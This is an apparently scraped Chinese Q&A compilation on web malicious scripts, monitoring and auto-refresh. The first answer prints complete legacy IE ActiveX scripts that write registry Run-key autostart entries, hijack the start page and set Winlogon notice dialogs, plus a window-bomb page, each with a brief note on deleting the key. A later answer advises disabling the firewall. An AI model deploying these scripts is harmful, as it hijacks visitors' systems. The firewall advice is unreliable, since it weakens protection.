『壹』 網頁惡意腳本檢測的實現
惡意腳本, 就是點擊人點擊觀看帶惡意腳本的網站後,通過腳本實現刪除注冊表項或更改替換注冊表項!或者運行某些程序!或者後台隱藏下載某些插件和病毒!. 都是可以實現的!
例如:
讓電腦自動啟動程序的代碼,修改方法:找到相應鍵值並刪除
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
文件://ActiveX/ initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://i50.yjpc.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
自動設成主頁代碼
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://i50.126.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
IE視窗炸彈或者叫讓IE不段循環的代碼
<HTML>
<HEAD>
<TITLE>f\*\*k USA</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY onload="WindowBomb()">
<SCRIPT LANGUAGE="javascript">
function WindowBomb()
{
var iCounter = 0 // mmy counter
while (true)
{
window.open("http://www.webjx.com","CRASHING" + iCounter,"width=1,height=1,resizable=no")
iCounter++
}
}
</script>
</BODY>
</HTML>
進入WINDOWS 之前彈出來的對話框代碼 到注冊表找到 LegalNoticeCaption , LegalNoticeText 刪除
<SCRIPT language=java script>document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "測試");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "測試");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "測試");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "測試");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();</SCRIPT>
一般都是通過注冊表 和快捷鍵的方式!觸發,也有很多方法!
『貳』 雨課堂網頁版線上監考可以檢測到油猴腳本嗎
可以。
考試用油猴插件自動答題會被檢測到,因為後台的監考老師具有實時監測考生屏幕的許可權。現在作答每一題的時長也會被記錄,教師同樣也可看到,意味著如果有人找槍手做題後,自己再抄上去,作答時間可能就會異常。
『叄』 怎樣去掉網頁腳本監控
關閉防火牆就行了.個人網路開不開防火牆沒什麼區別、因為沒人會攻擊你玩、 或者關閉瑞星網頁監控也可以。
『肆』 如何寫一個網頁腳本,可自動監控網頁上面的一個數據發生變化呢
那就自動刷新了
一可以網頁的自動刷新功能
在網頁的開頭寫代碼
<meta http-equiv="refresh" content="3; url=http://www.85815.com">
refresh表示刷新
content=3表示間隔3秒刷新一次
url表示刷新後跳轉的頁面,如果是本頁面,就寫本頁面的網址
再就是要用到ajax,這個我不太懂,所以就不說了
『伍』 瑞星殺毒軟體網頁監控里直接跳過網頁中的腳本是什麼意思
網頁中常有些腳本(一種程序)帶有病毒,容易造成系統癱瘓。
跳過網頁中的腳本:就是不執行(運行)該腳本(程序)。